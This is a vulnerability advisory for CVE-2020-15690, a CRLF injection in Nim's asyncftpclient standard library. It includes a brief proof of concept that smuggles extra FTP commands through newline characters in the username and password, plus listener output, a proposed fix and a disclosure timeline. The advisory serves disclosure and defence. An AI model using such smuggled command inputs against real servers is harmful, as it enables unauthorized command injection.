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[CVE-2020-15690] Nim - stdlib asyncftpd - Crlf Injection

From: Martin Ortner <martin.ortner () consensys net>
Date: Thu, 4 Feb 2021 15:58:23 +0100

title: "Nim - stdlib asyncftpd - Crlf Injection"
date: 2021-02-04T15:25:49+01:00

cve: ["CVE-2020-15690"]
vendor: nim-lang
vendorUrl: https://nim-lang.org/
authors: tintinweb
affectedVersions: [ "< 1.2.6" ]
vulnClass: CWE-93

Vulnerability Note: https://consensys.net/diligence/vulnerabilities/nim-asyncftpd-crlf-injection/
Vulnerability Note: https://github.com/tintinweb/pub/tree/master/pocs/cve-2020-15690
Group: https://consensys.net/diligence/research/

# Vulnerability Note

## Summary 

In Nim before 1.2.6, the standard library asyncftpclient lacks a check for whether a message contains a newline 

## Details

### Description

The nim standard library `asyncftpclient` is vulnerable to multiple `CR-LF` injections. An injection is possible if the 
attacker controls any argument that is passed to the remote server such as the `username` and `password` to 

The root cause of this issue is that the `send(ftp, msg)` allows `msg` to contain `CR-LF` control characters. An 
attacker that controls any unchecked input to `send()` can therefore inject arbitrary FTP commands. 

proc send*(ftp: AsyncFtpClient, m: string): Future[TaintedString] {.async.} =
  ## Send a message to the server, and wait for a primary reply.
  ## ``\c\L`` is added for you.
  ## **Note:** The server may return multiple lines of coded replies.
  await ftp.csock.send(m & "\c\L")
  return await ftp.expectReply()

### Proof of Concept

Note: `nim c -r -d:ssl  crlf_inject.nim`

* Injecting FTP commands via `user` and `pass`

import asyncdispatch, asyncftpclient
proc main() {.async.} =
  var ftp = newAsyncFtpClient("localhost", user = "test\nINJECTED_LINE test test", pass = "test\nINJECTED_LINE test 
test 2")
  await ftp.connect()


⇒ nim c -r -d:ssl  crlf_inject.nim
Hint: 104717 LOC; 1.030 sec; 113.309MiB peakmem; Debug build; proj: 
/Users/tintin/workspace/nim/test/issues/asyncftpclient/crlf_inject.nim; out: 
/Users/tintin/workspace/nim/test/issues/asyncftpclient/crlf_inject [SuccessX]
Hint: /Users/tintin/workspace/nim/test/issues/asyncftpclient/crlf_inject  [Exec]

⇒  nc -l 21
220 fake ftp
USER test
230 Hi test, thanks for injecting a line...
PASS test
INJECTED_LINE test test 2
230 thx for injecting another line...

### Proposed Fix

- properly validate user input
- raise an exception if `CR` or `LF` if found in the `msg` passed to `send()` 

## Vendor Response

Vendor response: fixed in 1.2.6

### Timeline

JUL/13/2020 - contact dom96//AT//telegram; provided details, PoC
FEB/04/2020 - public disclosure

## References

* [1] https://nim-lang.org/
* [2] https://nim-lang.org/install.html
* [3] https://en.wikipedia.org/wiki/Nim_(programming_language)

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